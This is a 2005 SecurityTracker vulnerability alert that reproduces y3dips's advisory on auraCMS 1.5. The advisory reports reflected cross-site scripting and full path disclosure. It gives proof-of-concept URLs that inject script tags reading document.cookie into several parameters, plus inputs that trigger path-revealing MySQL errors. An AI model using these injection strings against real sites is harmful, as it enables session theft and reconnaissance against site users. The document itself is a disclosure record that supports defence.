|
|
|
|
auraCMS Discloses Path to Remote Users and Permits Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1013357 |
|
SecurityTracker URL: http://securitytracker.com/id/1013357
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 2 2005
|
Impact:
Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 1.5
|
Description:
Several vulnerabilities were reported in auraCMS. A remote user can conduct cross-site scripting attacks. A remote user can determine the installation path.
The software does not properly validate user-supplied input in various parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the auraCMS software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
http://[target]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
A remote user can also supply the following type of URL to determine the installation path:
http://[target]/[aura]/?pilih=teman&id=34%60select%20all
http://[target]/[aura]/?pilih=hal&id=4%60tes
http://[target]/[aura]/?pilih=arsip&topik=1%60
The vendor was notified on February 15, 2005.
y3dips reported this vulnerability.
The original advisory is available at:
http://echo.or.id/adv/adv011-y3dips-2005.txt
|
Impact:
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the auraCMS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A remote user can determine the installation path.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: auracms.opensource-indonesia.com/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: Vulnerabilities in Aura CMS
|
---------------------------------------------------------------------------
Vulnerabilities in Aura CMS
---------------------------------------------------------------------------
Author: y3dips
Date: Januari, 25th 2005
Location: Indonesia, Jakarta
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
auraCMS (Content Management System)
version: 1.5
date : 21 September 2004
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL
Author: Arif Supriyanto - arif@ayo.kliksini.com
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
Description:
auraCMS is a PHP script package that you to possiblity to building
a website with dynamic content easier and faster, no waste time more.
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full Path disclosures
==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/teman.php on line 9
==>> http://[site]/[aura]/?pilih=hal&id=4%60tes
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/hal.php on line 10
==>> http://[site]/[aura]/?pilih=arsip&topik=1%60
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in
/home/cxxo/public_html/aura/arsip.php on line 11
B. Session ID
CMS with This version has two method of authentication (session and cookies) ,
this problem has found in session method .
There are so many variable that havent declared yet, it makes attacker could
exploit it by inputing some "character" n gaining an session id on windows pop up
for eXample
---- hits.php -----
<?
$perintah = "SELECT * FROM counter WHERE id=1";
$hasil = mysql_query( $perintah );
while ($data = mysql_fetch_row($hasil)) {
$hits=$data[3];
}
echo "<b>$hits</b>";
?>
-------end -------
look $hits variable , do you see something interested ? yes SIR , we've found something
lets do some try
==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
then you get the session ID
another vulnerable :
in pencarian (search) input box
+ http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
also in counter module
+ http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
p.s : Wanna know what session IDs gives you ? try google :D
---------------------------------------------------------------------------
FIx :
founded : Januari 25th 2005
reported to vendor :Februari 15th 2005
;vendor respond but not yet releasing any patch
publish at securityfocus : March 2th 2005
---------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com ,http://forum.ehco.or.id
~ #e-c-h-o@DALNET
---------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]gmail[dot]com
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ----------------------------------
|
|
Go to the Top of This SecurityTracker Archive Page
|
